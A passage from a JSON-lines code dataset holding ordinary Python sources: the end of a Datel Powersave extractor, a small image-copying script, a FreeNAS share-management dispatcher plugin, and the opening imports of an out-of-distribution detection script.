Common.datel_crc32(b'')\n                    while True:\n                        data = infile.read(16384)\n                        if len(data) == 0:\n                            break\n                        computedPayloadCRC32 = Common.datel_crc32(data, computedPayloadCRC32)\n                        outfile.write(data)\n\n                if computedPayloadCRC32 != readPayloadCRC32:\n                    raise IOError('Powersave format error : Unverified Payload CRC32')\n\n        return description\n\nif __name__ == \"__main__\":\n    if len(sys.argv) <= 2:\n        syntax()\n        sys.exit(1)\n\n    powerSaveFile = sys.argv[1]\n    index_option = 2\n    powerSavename = False\n    rawFile = None\n    while index_option < len(sys.argv):\n        option = sys.argv[index_option]\n        if option == '-n':\n            # syntax() documents -n for the display name; the old '-d' check made that option unreachable\n            powerSavename = True\n            index_option += 1\n        elif option == '-r':\n            if index_option + 1 < len(sys.argv):\n                rawFile = sys.argv[index_option + 1]\n                index_option += 2\n            else:\n                syntax()\n                sys.exit(1)\n        else:\n            syntax()\n            sys.exit(1)\n\n    if not powerSavename and rawFile is None:\n        syntax()\n        sys.exit(1)\n\n    extractor = ExtractPowersave(powerSaveFile, rawFile)\n    description = extractor.extract()\n    if powerSavename:\n        print(description)\n","sub_path":"ExtractPowersave.py","file_name":"ExtractPowersave.py","file_ext":"py","file_size_in_byte":4684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"263999604","text":"\"\"\"Take empty pics from pics2, as catalogued in empty_pics,\n   and move pics from pics\"\"\"\nimport os\n\nto_move = {}\nwith open('working/empty_pics') as f:\n    for line in f:\n        to_move[line.strip()] = True\nfor m in to_move:\n    os.system('cp working/pics/' + m + ' working/pics2/')\n","sub_path":"cp_good_pics.py","file_name":"cp_good_pics.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"109539165","text":"#\n# Copyright 2015 iXsystems, Inc.\n# All rights reserved\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted providing that the following 
conditions\n# are met:\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR\n# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS\n# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\n# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING\n# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n#\n#####################################################################\n\nimport os\nimport errno\nfrom freenas.dispatcher.rpc import description, accepts, returns, private\nfrom freenas.dispatcher.rpc import SchemaHelper as h, generator\nfrom task import Task, TaskException, TaskDescription, VerifyException, Provider, RpcException, query, TaskWarning\nfrom freenas.utils import normalize, in_directory, remove_unchanged, query as q\nfrom freenas.utils.lazy import lazy\nfrom debug import AttachRPC\nfrom utils import split_dataset, save_config, load_config, delete_config\n\n\nCONFIG_VERSION = 100000\n\n\n@description(\"Provides information on shares\")\nclass SharesProvider(Provider):\n @query('Share')\n @generator\n def query(self, filter=None, params=None):\n def extend(share):\n path = None\n try:\n path = self.translate_path(share['id'])\n except RpcException:\n pass\n\n def get_perms():\n if share['target_type'] in ('DIRECTORY', 'DATASET', 'FILE'):\n perms = self.dispatcher.call_sync('filesystem.stat', path)\n return perms['permissions']\n\n def get_perm_type():\n if share['target_type'] == 'DATASET':\n return self.dispatcher.call_sync(\n 'volume.dataset.query',\n [('id', '=', share['target_path'])],\n {'select': 'permissions_type', 'single': True}\n )\n\n share['filesystem_path'] = path\n share['permissions_type'] = lazy(get_perm_type)\n share['permissions'] = lazy(get_perms)\n return share\n\n return q.query(\n self.datastore.query_stream('shares', callback=extend),\n *(filter or []),\n stream=True,\n **(params or {})\n )\n\n @description(\"Returns list of supported sharing providers\")\n @accepts()\n @returns(h.ref('ShareTypes'))\n def supported_types(self):\n result = {}\n for p in list(self.dispatcher.plugins.values()):\n if p.metadata and p.metadata.get('type') == 'sharing':\n result[p.metadata['method']] = {\n 'subtype': p.metadata['subtype'],\n 'perm_type': p.metadata.get('perm_type'),\n 'version': p.metadata.get('version')\n }\n\n return result\n\n @description(\"Returns list of clients connected to particular share\")\n @accepts(str)\n @returns(h.array(h.ref('ShareClient')))\n def get_connected_clients(self, id):\n share = self.datastore.get_by_id('shares', id)\n if not share:\n raise RpcException(errno.ENOENT, 'Share not found')\n\n return self.dispatcher.call_sync('share.{0}.get_connected_clients'.format(share['type']), id)\n\n @description(\"Get shares dependent on provided 
filesystem path\")\n @accepts(str, bool, bool)\n @returns(h.array(h.ref('Share')))\n def get_dependencies(self, path, enabled_only=True, recursive=True):\n result = []\n if enabled_only:\n shares = self.datastore.query_stream('shares', ('enabled', '=', True))\n else:\n shares = self.datastore.query_stream('shares')\n\n for i in shares:\n target_path = self.translate_path(i['id'])\n if recursive:\n if in_directory(target_path, path):\n result.append(i)\n else:\n if target_path == path:\n result.append(i)\n\n return result\n\n @private\n def translate_path(self, share_id):\n share = self.datastore.get_by_id('shares', share_id)\n if not share:\n raise RpcException(errno.ENOENT, 'Share {0} not found'.format(share_id))\n\n return self.dispatcher.call_sync('share.expand_path', share['target_path'], share['target_type'])\n\n @private\n def expand_path(self, path, type):\n root = self.dispatcher.call_sync('volume.get_volumes_root')\n if type == 'DATASET':\n return os.path.join(root, path)\n\n if type == 'ZVOL':\n return os.path.join('/dev/zvol', path)\n\n if type in ('DIRECTORY', 'FILE'):\n return path\n\n raise RpcException(errno.EINVAL, 'Invalid share target type {0}'.format(type))\n\n @private\n def get_directory_path(self, share_id):\n share = self.datastore.get_by_id('shares', share_id)\n return self.dispatcher.call_sync('share.get_dir_by_path', share['target_path'], share['target_type'])\n\n @private\n def get_dir_by_path(self, path, type):\n root = self.dispatcher.call_sync('volume.get_volumes_root')\n if type == 'DATASET':\n return os.path.join(root, path)\n\n if type == 'ZVOL':\n return os.path.dirname(os.path.join(root, path))\n\n if type == 'DIRECTORY':\n return path\n\n if type == 'FILE':\n return os.path.dirname(path)\n\n raise RpcException(errno.EINVAL, 'Invalid share target type {0}'.format(type))\n\n\n@description(\"Creates new share\")\n@accepts(\n h.all_of(\n h.ref('Share'),\n h.required('name', 'type', 'target_type', 'target_path', 'properties')\n ),\n h.one_of(\n h.ref('VolumeDatasetProperties'),\n None\n ),\n bool\n)\nclass CreateShareTask(Task):\n @classmethod\n def early_describe(cls):\n return \"Creating share\"\n\n def describe(self, share, dataset_properties=None, enable_service=False):\n return TaskDescription(\"Creating share {name}\", name=share.get('name') if share else '')\n\n def verify(self, share, dataset_properties=None, enable_service=False):\n if not self.dispatcher.call_sync('share.supported_types').get(share['type']):\n raise VerifyException(errno.ENXIO, 'Unknown sharing type {0}'.format(share['type']))\n\n return ['system']\n\n def run(self, share, dataset_properties=None, enable_service=False):\n if share['target_type'] == 'ZVOL':\n parent_ds = '/'.join(share['target_path'].split('/')[:-1])\n shareable = bool(self.dispatcher.call_sync('volume.dataset.query', [('name', '=', parent_ds)]))\n else:\n share_path = self.dispatcher.call_sync('share.expand_path', share['target_path'], share['target_type'])\n if share['target_type'] != 'FILE':\n share_path = os.path.dirname(share_path)\n shareable = os.path.exists(share_path)\n\n if not shareable:\n raise TaskException(errno.ENOENT, 'Selected share target {0} does not exist or cannot be created'.format(\n share['target_path']\n ))\n\n root = self.dispatcher.call_sync('volume.get_volumes_root')\n share_type = self.dispatcher.call_sync('share.supported_types').get(share['type'])\n pool_mountpoints = tuple(self.dispatcher.call_sync('volume.query', [], {'select': 'mountpoint'}))\n\n assert share_type['subtype'] in 
('FILE', 'BLOCK'), \"Unsupported share type: {0}\".format(share_type['subtype'])\n\n if self.datastore.exists(\n 'shares',\n ('type', '=', share['type']),\n ('name', '=', share['name'])\n ):\n raise TaskException(errno.EEXIST, 'Share {0} of type {1} already exists'.format(\n share['name'],\n share['type']\n ))\n\n if self.datastore.exists(\n 'shares',\n ('target_type', '=', share['target_type']),\n ('target_path', '=', share['target_path'])\n ):\n self.add_warning(TaskWarning(errno.EEXIST, f'There are other shares set on {share[\"target_path\"]}'))\n\n normalize(share, {\n 'enabled': True,\n 'immutable': False,\n 'description': ''\n })\n\n if share['target_type'] in ('DATASET', 'ZVOL'):\n dataset = share['target_path']\n pool = share['target_path'].split('/')[0]\n path = os.path.join(root, dataset)\n\n if not self.dispatcher.call_sync('zfs.dataset.query', [('name', '=', dataset)], {'single': True}):\n if share_type['subtype'] == 'FILE':\n self.run_subtask_sync('volume.dataset.create', {\n 'volume': pool,\n 'id': dataset,\n 'permissions_type': share_type['perm_type'],\n 'properties': dataset_properties or {}\n })\n\n if share_type['subtype'] == 'BLOCK':\n self.run_subtask_sync('volume.dataset.create', {\n 'volume': pool,\n 'id': dataset,\n 'type': 'VOLUME',\n 'volsize': share['properties']['size'],\n 'properties': dataset_properties or {}\n })\n else:\n if share_type['subtype'] == 'FILE':\n self.run_subtask('volume.dataset.update', dataset, {\n 'permissions_type': share_type['perm_type']\n })\n\n elif share['target_type'] == 'DIRECTORY':\n if not share['target_path'].startswith(pool_mountpoints):\n raise TaskException(errno.EINVAL, \"Provided directory has to reside within user defined ZFS pool\")\n\n # Verify that target directory exists\n path = share['target_path']\n if not os.path.isdir(path):\n raise TaskException(errno.ENOENT, \"Target directory {0} doesn't exist\".format(path))\n\n elif share['target_type'] == 'FILE':\n if not share['target_path'].startswith(pool_mountpoints):\n raise TaskException(errno.EINVAL, \"Provided file has to reside within user defined ZFS pool\")\n # Verify that target file exists\n path = share['target_path']\n if not os.path.isfile(path):\n raise TaskException(errno.ENOENT, \"Target file {0} doesn't exist\".format(path))\n\n else:\n raise AssertionError('Invalid target type')\n\n if share.get('permissions') and share['target_type'] not in ('ZVOL', 'FILE'):\n self.run_subtask_sync('file.set_permissions', path, share.pop('permissions'))\n\n id = self.run_subtask_sync('share.{0}.create'.format(share['type']), share)\n self.dispatcher.dispatch_event('share.changed', {\n 'operation': 'create',\n 'ids': [id]\n })\n\n new_share = self.datastore.get_by_id('shares', id)\n path = self.dispatcher.call_sync('share.get_directory_path', new_share['id'])\n try:\n save_config(\n path,\n '{0}-{1}'.format(new_share['type'], new_share['name']),\n new_share,\n file_perms=0o600,\n version=CONFIG_VERSION\n )\n except OSError as err:\n self.add_warning(TaskWarning(errno.ENXIO, 'Cannot save backup config file: {0}'.format(str(err))))\n\n service_state = self.dispatcher.call_sync('service.query', [('name', '=', share['type'])], {'single': True})\n if service_state['state'] != 'RUNNING':\n if enable_service:\n config = service_state['config']\n config['enable'] = True\n self.run_subtask_sync('service.update', service_state['id'], {'config': config})\n else:\n self.add_warning(TaskWarning(\n errno.ENXIO, \"Share has been created but the service {0} is not currently running \"\n 
\"Please enable the {0} service.\".format(share['type'])\n ))\n\n return id\n\n\n@description(\"Updates existing share\")\n@accepts(str, h.ref('Share'), bool)\nclass UpdateShareTask(Task):\n @classmethod\n def early_describe(cls):\n return \"Updating share\"\n\n def describe(self, id, updated_fields, enable_service=False):\n share = self.datastore.get_by_id('shares', id)\n return TaskDescription(\"Updating share {name}\", name=share.get('name', id) if share else id)\n\n def verify(self, id, updated_fields, enable_service=False):\n return ['system']\n\n def run(self, id, updated_fields, enable_service=False):\n share = self.datastore.get_by_id('shares', id)\n if not share:\n raise TaskException(errno.ENOENT, 'Share not found')\n\n if share['immutable']:\n raise TaskException(errno.EACCES, 'Cannot modify immutable share {0}.'.format(id))\n\n if 'name' in updated_fields or 'type' in updated_fields:\n share.update(updated_fields)\n if self.datastore.exists(\n 'shares',\n ('id', '!=', id),\n ('type', '=', share['type']),\n ('name', '=', share['name'])\n ):\n raise TaskException(errno.EEXIST, 'Share {0} of type {1} already exists'.format(\n share['name'],\n share['type']\n ))\n\n if 'target_type' in updated_fields or 'target_path' in updated_fields:\n if self.datastore.exists(\n 'shares',\n ('target_type', '=', share['target_type']),\n ('target_path', '=', share['target_path']),\n ('id', '!=', id)\n ):\n self.add_warning(TaskWarning(errno.EEXIST, f'There are other shares set on {share[\"target_path\"]}'))\n\n path_after_update = updated_fields.get('target_path', share['target_path'])\n type_after_update = updated_fields.get('target_type', share['target_type'])\n permissions = updated_fields.pop('permissions', None)\n share_path = self.dispatcher.call_sync('share.expand_path', path_after_update, type_after_update)\n\n if type_after_update in ('DIRECTORY', 'FILE'):\n pool_mountpoints = tuple(self.dispatcher.call_sync('volume.query', [], {'select': 'mountpoint'}))\n if not path_after_update.startswith(pool_mountpoints):\n raise TaskException(errno.EINVAL, \"Provided directory or file has to reside within user defined ZFS pool\")\n\n if not os.path.exists(share_path):\n raise TaskException(\n errno.ENOENT,\n 'Selected share target {0} does not exist'.format(path_after_update)\n )\n\n share = self.datastore.get_by_id('shares', id)\n remove_unchanged(updated_fields, share)\n\n path = self.dispatcher.call_sync('share.get_directory_path', share['id'])\n try:\n delete_config(\n path,\n '{0}-{1}'.format(share['type'], share['name'])\n )\n except (OSError, ValueError):\n pass\n\n if share['target_type'] == 'ZVOL' and q.get(updated_fields, 'properties.size'):\n pool, dataset = split_dataset(share['target_path'])\n self.run_subtask_sync('volume.dataset.update', dataset, {\n 'volsize': q.get(updated_fields, 'properties.size')\n })\n\n if 'type' in updated_fields:\n old_share_type = share['type']\n new_share_type = self.dispatcher.call_sync('share.supported_types').get(updated_fields['type'])\n if share['target_type'] == 'DATASET':\n pool, dataset = split_dataset(share['target_path'])\n self.join_subtasks(\n self.run_subtask('volume.dataset.update', dataset, {\n 'permissions_type': new_share_type['perm_type']\n })\n )\n\n share.update(updated_fields)\n self.run_subtask_sync('share.{0}.delete'.format(old_share_type), id)\n self.run_subtask_sync('share.{0}.create'.format(updated_fields['type']), share)\n else:\n self.run_subtask_sync('share.{0}.update'.format(share['type']), id, updated_fields)\n\n if 
permissions:\n            path = self.dispatcher.call_sync('share.translate_path', id)\n            self.run_subtask_sync('file.set_permissions', path, permissions)\n\n        self.dispatcher.dispatch_event('share.changed', {\n            'operation': 'update',\n            'ids': [share['id']]\n        })\n\n        updated_share = self.datastore.get_by_id('shares', id)\n        path = self.dispatcher.call_sync('share.get_directory_path', updated_share['id'])\n        try:\n            save_config(\n                path,\n                '{0}-{1}'.format(updated_share['type'], updated_share['name']),\n                updated_share,\n                file_perms=0o600,\n                version=CONFIG_VERSION\n            )\n        except OSError as err:\n            self.add_warning(TaskWarning(errno.ENXIO, 'Cannot save backup config file: {0}'.format(str(err))))\n\n        service_state = self.dispatcher.call_sync('service.query', [('name', '=', share['type'])], {'single': True})\n        if service_state['state'] != 'RUNNING':\n            if enable_service:\n                config = service_state['config']\n                config['enable'] = True\n                self.run_subtask_sync('service.update', service_state['id'], {'config': config})\n            else:\n                self.add_warning(TaskWarning(\n                    errno.ENXIO,\n                    \"Share has been updated but the service {0} is not currently running. \"\n                    \"Please enable the {0} service.\".format(share['type'])\n                ))\n\n\n@description(\"Imports existing share\")\n@accepts(str, str, str)\nclass ImportShareTask(Task):\n    @classmethod\n    def early_describe(cls):\n        return \"Importing share\"\n\n    def describe(self, config_path, name, type):\n        return TaskDescription(\"Importing share {name} from {config_path}\", name=name, config_path=config_path)\n\n    def verify(self, config_path, name, type):\n        return ['system']\n\n    def run(self, config_path, name, type):\n        try:\n            share = load_config(config_path, f'{type}-{name}', version=CONFIG_VERSION)\n        except FileNotFoundError:\n            raise VerifyException(\n                errno.ENOENT,\n                f'There is no share {name} of type {type} at {config_path} to be imported.'\n            )\n        except ValueError as err:\n            raise VerifyException(errno.EINVAL, f'Cannot read configuration file: {err}')\n\n        if share['type'] != type:\n            raise VerifyException(\n                errno.EINVAL,\n                f'Share type {type} does not match configuration file entry type {share[\"type\"]}'\n            )\n\n        if not self.dispatcher.call_sync('share.supported_types').get(share['type']):\n            raise TaskException(errno.ENXIO, f'Unknown sharing type {share[\"type\"]}')\n\n        if self.datastore.exists(\n            'shares',\n            ('type', '=', share['type']),\n            ('name', '=', share['name'])\n        ):\n            raise TaskException(errno.EEXIST, f'Share {share[\"name\"]} of type {share[\"type\"]} already exists')\n\n        id = self.run_subtask_sync(f'share.{share[\"type\"]}.import', share)\n        self.dispatcher.dispatch_event('share.changed', {\n            'operation': 'create',\n            'ids': [id]\n        })\n\n        return id\n\n\n@description(\"Sets share immutable\")\n@accepts(str, bool)\nclass ShareSetImmutableTask(Task):\n    @classmethod\n    def early_describe(cls):\n        return 'Updating share\\'s immutable property'\n\n    def describe(self, id, immutable):\n        share = self.datastore.get_by_id('shares', id)\n        return TaskDescription(\n            'Setting {name} share\\'s immutable property to {value}',\n            name=share.get('name', id) if share else id,\n            value='on' if immutable else 'off'\n        )\n\n    def verify(self, id, immutable):\n        return ['system']\n\n    def run(self, id, immutable):\n        if not self.datastore.exists('shares', id):\n            raise TaskException(errno.ENOENT, 'Share {0} does not exist'.format(id))\n\n        share = self.datastore.get_by_id('shares', id)\n        share['immutable'] = immutable\n        share['enabled'] = not immutable\n        self.datastore.update('shares', id, share)\n        
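# notify listeners through the same 'share.changed' event the other share tasks emit\n        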
self.dispatcher.dispatch_event('share.changed', {\n            'operation': 'update',\n            'ids': [share['id']]\n        })\n\n\n@description(\"Deletes share\")\n@accepts(str, bool)\nclass DeleteShareTask(Task):\n    @classmethod\n    def early_describe(cls):\n        return \"Deleting share\"\n\n    def describe(self, id, delete_dataset=False):\n        share = self.datastore.get_by_id('shares', id)\n        return TaskDescription(\"Deleting share {name}\", name=share.get('name', id) if share else id)\n\n    def verify(self, id, delete_dataset=False):\n        return ['system']\n\n    def run(self, id, delete_dataset=False):\n        share = self.datastore.get_by_id('shares', id)\n        # check for existence before dereferencing the share record\n        if not share:\n            raise TaskException(errno.ENOENT, 'Share not found')\n\n        target_type = share['target_type']\n        dataset = None\n\n        if target_type == 'DATASET' or target_type == 'ZVOL':\n            dataset = share['target_path']\n        elif delete_dataset:\n            raise TaskException(errno.EINVAL, 'Cannot delete dataset for non-dataset share')\n\n        path = self.dispatcher.call_sync('share.get_directory_path', share['id'])\n\n        try:\n            delete_config(\n                path,\n                '{0}-{1}'.format(share['type'], share['name'])\n            )\n        except OSError:\n            pass\n\n        self.run_subtask_sync('share.{0}.delete'.format(share['type']), id)\n        self.dispatcher.dispatch_event('share.changed', {\n            'operation': 'delete',\n            'ids': [id]\n        })\n        if dataset and delete_dataset:\n            self.run_subtask_sync('volume.dataset.delete', dataset)\n\n\n@description(\"Export share\")\n@accepts(str)\nclass ExportShareTask(Task):\n    @classmethod\n    def early_describe(cls):\n        return \"Exporting share\"\n\n    def describe(self, id):\n        share = self.datastore.get_by_id('shares', id)\n        return TaskDescription(\"Exporting share {name}\", name=share.get('name', id) if share else id)\n\n    def verify(self, id):\n        return ['system']\n\n    def run(self, id):\n        share = self.datastore.get_by_id('shares', id)\n        if not share:\n            raise TaskException(errno.ENOENT, 'Share not found')\n\n        self.run_subtask_sync('share.{0}.delete'.format(share['type']), id)\n        self.dispatcher.dispatch_event('share.changed', {\n            'operation': 'delete',\n            'ids': [id]\n        })\n\n\n@description(\"Deletes all shares dependent on specified volume/dataset\")\n@accepts(str)\nclass DeleteDependentShares(Task):\n    @classmethod\n    def early_describe(cls):\n        return 'Deleting shares related to system path'\n\n    def describe(self, path):\n        return TaskDescription('Deleting shares related to system path {name}', name=path)\n\n    def verify(self, path):\n        return ['system']\n\n    def run(self, path):\n        for i in self.dispatcher.call_sync('share.get_dependencies', path):\n            self.run_subtask_sync('share.delete', i['id'])\n\n\n@private\n@description(\"Updates all shares related to specified volume/dataset\")\n@accepts(str, h.ref('Share'))\nclass UpdateRelatedShares(Task):\n    @classmethod\n    def early_describe(cls):\n        return 'Updating shares related to system path'\n\n    def describe(self, path, updated_fields):\n        return TaskDescription('Updating shares related to system path {name}', name=path)\n\n    def verify(self, path, updated_fields):\n        return ['system']\n\n    def run(self, path, updated_fields):\n        subtasks = []\n        for i in self.dispatcher.call_sync('share.get_dependencies', path, False):\n            subtasks.append(self.run_subtask('share.update', i['id'], updated_fields))\n\n        self.join_subtasks(*subtasks)\n\n\n@description(\"Kills client connections from specified IP address\")\n@accepts(str, str)\nclass ShareTerminateConnectionTask(Task):\n    @classmethod\n    def early_describe(cls):\n        return 'Killing connections to share'\n\n    def describe(self, share_type, 
address):\n return TaskDescription('Killing {address} connections to {name} share', address=address, name=share_type)\n\n def verify(self, share_type, address):\n return ['system']\n\n def run(self, share_type, address):\n try:\n self.run_subtask_sync('share.{0}.terminate_connection'.format(share_type), address)\n except RpcException as err:\n if err.code not in (errno.ENOTSUP, errno.ENXIO):\n raise\n\n\ndef collect_debug(dispatcher):\n yield AttachRPC('share-query', 'share.query')\n\n\ndef _depends():\n return ['VolumePlugin']\n\n\ndef _init(dispatcher, plugin):\n plugin.register_schema_definition('Share', {\n 'type': 'object',\n 'properties': {\n 'id': {'type': 'string'},\n 'name': {'type': 'string'},\n 'description': {'type': 'string'},\n 'enabled': {'type': 'boolean'},\n 'immutable': {'type': 'boolean'},\n 'type': {'type': 'string'},\n 'target_type': {'$ref': 'ShareTargettype'},\n 'target_path': {'type': 'string'},\n 'filesystem_path': {\n 'type': 'string',\n 'readOnly': True\n },\n 'permissions_type': {\n 'oneOf': [\n {'$ref': 'VolumeDatasetPermissionsType'},\n {'type': 'null'}\n ]\n },\n 'permissions': {\n 'oneOf': [\n {'$ref': 'Permissions'},\n {'type': 'null'}\n ]\n },\n 'properties': {'$ref': 'ShareProperties'}\n }\n })\n\n plugin.register_schema_definition('ShareTargettype', {\n 'type': 'string',\n 'enum': ['DATASET', 'ZVOL', 'DIRECTORY', 'FILE']\n })\n\n plugin.register_schema_definition('ShareClient', {\n 'type': 'object',\n 'properties': {\n 'host': {'type': 'string'},\n 'share': {'type': 'string'},\n 'user': {'type': ['string', 'null']},\n 'connected_at': {'type': ['string', 'null']},\n 'extra': {\n 'type': 'object'\n }\n }\n })\n\n plugin.register_schema_definition('ShareTypes', {\n 'type': 'object',\n 'additionalProperties': {\n 'type': 'object',\n 'properties': {\n 'subtype': {'$ref': 'ShareTypesSubtype'},\n 'perm_type': {'oneOf': [\n {'$ref': 'ShareTypesPermtype'},\n {'type': 'null'}\n ]},\n },\n 'additionalProperties': False\n }\n })\n\n plugin.register_schema_definition('ShareTypesSubtype', {\n 'type': 'string',\n 'enum': ['FILE', 'BLOCK']\n })\n\n plugin.register_schema_definition('ShareTypesPermtype', {\n 'type': 'string',\n 'enum': ['PERM', 'ACL']\n })\n\n def volume_pre_destroy(args):\n try:\n path = dispatcher.call_sync('volume.resolve_path', args['name'], '')\n except RpcException:\n return True\n\n dispatcher.call_task_sync('share.delete_dependent', path)\n dispatcher.call_task_sync('share.delete_dependent', os.path.join('/dev/zvol', args['name']))\n return True\n\n def volume_rename(args):\n for share in dispatcher.call_sync('share.query'):\n new_path = share['target_path']\n if share['target_path'].startswith(args['name']):\n new_path = new_path.replace(args['name'], args['new_name'], 1)\n\n elif share['target_type'] in ('DIRECTORY', 'FILE'):\n if share['target_path'].startswith(args['mountpoint']):\n new_path = new_path.replace(args['mountpoint'], args['new_mountpoint'], 1)\n\n if new_path is not share['target_path']:\n dispatcher.call_task_sync('share.update', share['id'], {'target_path': new_path})\n return True\n\n def set_related_enabled(name, enabled):\n pool_properties = dispatcher.call_sync(\n 'zfs.pool.query',\n [('name', '=', name)],\n {'single': True, 'select': 'properties'}\n )\n if not q.get(pool_properties, 'readonly.parsed'):\n path = dispatcher.call_sync('volume.resolve_path', name, '')\n dispatcher.call_task_sync('share.update_related', path, {'enabled': enabled})\n dispatcher.call_task_sync('share.update_related', os.path.join('/dev/zvol', 
name), {'enabled': enabled})\n\n def volume_detach(args):\n set_related_enabled(args['name'], False)\n return True\n\n def volume_attach(args):\n set_related_enabled(args['name'], True)\n return True\n\n def update_share_properties_schema():\n plugin.register_schema_definition('ShareProperties', {\n 'discriminator': '%type',\n 'oneOf': [\n {'$ref': 'Share{0}'.format(name.title())} for name in dispatcher.call_sync('share.supported_types')\n ]\n })\n\n # Register providers\n plugin.register_provider('share', SharesProvider)\n\n # Register task handlers\n plugin.register_task_handler('share.create', CreateShareTask)\n plugin.register_task_handler('share.update', UpdateShareTask)\n plugin.register_task_handler('share.delete', DeleteShareTask)\n plugin.register_task_handler('share.export', ExportShareTask)\n plugin.register_task_handler('share.import', ImportShareTask)\n plugin.register_task_handler('share.immutable.set', ShareSetImmutableTask)\n plugin.register_task_handler('share.delete_dependent', DeleteDependentShares)\n plugin.register_task_handler('share.update_related', UpdateRelatedShares)\n plugin.register_task_handler('share.terminate_connection', ShareTerminateConnectionTask)\n\n # Register Event Types\n plugin.register_event_type(\n 'share.changed',\n schema={\n 'type': 'object',\n 'properties': {\n 'operation': {'type': 'string', 'enum': ['create', 'delete', 'update']},\n 'ids': {'type': 'array', 'items': 'string'},\n },\n 'additionalProperties': False\n }\n )\n\n update_share_properties_schema()\n dispatcher.register_event_handler('server.plugin.loaded', update_share_properties_schema)\n\n # Register Hooks\n plugin.attach_hook('volume.pre_destroy', volume_pre_destroy)\n plugin.attach_hook('volume.pre_detach', volume_detach)\n plugin.attach_hook('volume.post_attach', volume_attach)\n plugin.attach_hook('volume.post_rename', volume_rename)\n\n # Register debug hooks\n plugin.register_debug_hook(collect_debug)\n","sub_path":"src/dispatcher/plugins/SharingPlugin.py","file_name":"SharingPlugin.py","file_ext":"py","file_size_in_byte":31945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"262042013","text":"import gc\nimport logging\nimport os\nimport re\nfrom functools import partial\nfrom glob import glob\nimport matplotlib.pylab as plt\nimport numpy as np\nimport torch as th\nimport torch.nn.functional as F\nimport tqdm\n\nimport models\nfrom ast import literal_eval\nfrom calculate_log import metric\nfrom data import get_dataset\nfrom preprocess import get_transform\nfrom utils.log import setup_logging\nfrom utils.meters import MeterDict, AverageMeter, accuracy,SimpleOnlineMeterFactory\nimport reductions as rd\nimport layer_selection as ls\nimport channel_selection as cs\nfrom utils.temp_scaling import ModelWithTemperature, _ECELoss\nfrom OODdetector import OODDetector, measure_v2\n\n## todo remove\n# use this setting to save gpu memory\nglobal _USE_PERCENTILE_DEVICE\nglobal _MONITOR_OP_OUTPUTS\n\n_MONITOR_OP_OUTPUTS = False # True # used to flip stats monitors to output tracking instead if input tracking\n_USE_PERCENTILE_DEVICE = False\n_TRACK_SOFTMAX_TEMP = 100\n_DROP_LAST_BATCH_MEASURE = True\n\n\nclass TrackOutput(th.nn.Module):\n def __init__(self, model, track_smx_output=False, track_fc_output=True, temperature=None):\n super().__init__()\n self.model = model\n self.temp = temperature or 1\n if track_fc_output:\n self.output_fc = th.nn.Identity()\n if track_smx_output:\n self.output_softmax = th.nn.Identity()\n\n def 
forward(self, x):\n        out = self.model(x)\n        if hasattr(self, 'output_fc'):\n            out = self.output_fc(out)\n        if hasattr(self, 'output_softmax'):\n            ## do not change model output, this will only be used to monitor activations by the tracker\n            self.output_softmax(F.softmax(out / self.temp, -1))\n        return out\n\n\n#a hack that uses split string for fine grain control over the returned dataset\ndef get_ds_split_modifier(dataset,split,transform,default_limit,default_per_class_limit):\n    if '@' in split:\n        defaults = dict(transform=transform, limit=default_limit, per_class_limit=default_per_class_limit,\n                        shuffle_before_limit=True,limit_shuffle_seed=0)\n        alternative_ds_name, split, kwargs = split.split('@')\n        kwargs = literal_eval(kwargs) if kwargs else {}\n        defaults.update(kwargs)\n        return get_dataset(alternative_ds_name, split, **defaults)\n    else:\n        # use split as is\n        return get_dataset(dataset, split, transform, limit=default_limit,\n                           per_class_limit=default_per_class_limit, limit_shuffle_seed=0)\n\n\ndef temp_scaling(model,loader_cal ,test_logits, device):\n    model_temperature = ModelWithTemperature(model, device=device)\n    model_temperature.set_temperature(loader_cal)\n    return model_temperature.temperature_scale(test_logits.to(device)),model_temperature.temperature.cpu()\n\n\ndef _fusion_pvalues(dict_of_methods_pvalues, max_rank=2, reductions=None):\n    # rejected['fusion']=MeterDict(meter_factory=SimpleOnlineMeterFactory(batched=True))\n    ret_pvalues = {}\n    from itertools import combinations\n    if reductions is None:\n        reductions = dict_of_methods_pvalues.keys()\n\n    for i in range(2, max_rank + 1):\n        for pval_method_comb in combinations(reductions, i):\n            fusion_name = ''\n            fused_pval = []\n            for pval_method in pval_method_comb:\n                fusion_name += f'+{pval_method}'\n                fused_pval.append(dict_of_methods_pvalues[pval_method])\n            fused_pval = th.stack(fused_pval, 1)\n            ret_pvalues[fusion_name] = rd.calc_simes(fused_pval).squeeze(1)\n    return ret_pvalues\n\n\ndef _gen_curve(pvalues_for_val,alpha_list):\n    rejected_ = []\n    for alpha_ in alpha_list:\n        rejected_.append((pvalues_for_val <= alpha_).float())  # .unsqueeze(1))\n    return th.stack(rejected_, 1)\n\n\ndef _maybe_concat_tensor_dict(dictionary,key,value,axis=0):\n    if key in dictionary:\n        dictionary[key] = th.cat([dictionary[key], value], axis)\n    else:\n        dictionary[key] = value\n\n\ndef evaluate_data(loader, model, detector, model_device, alpha_list=None, in_dist=False, 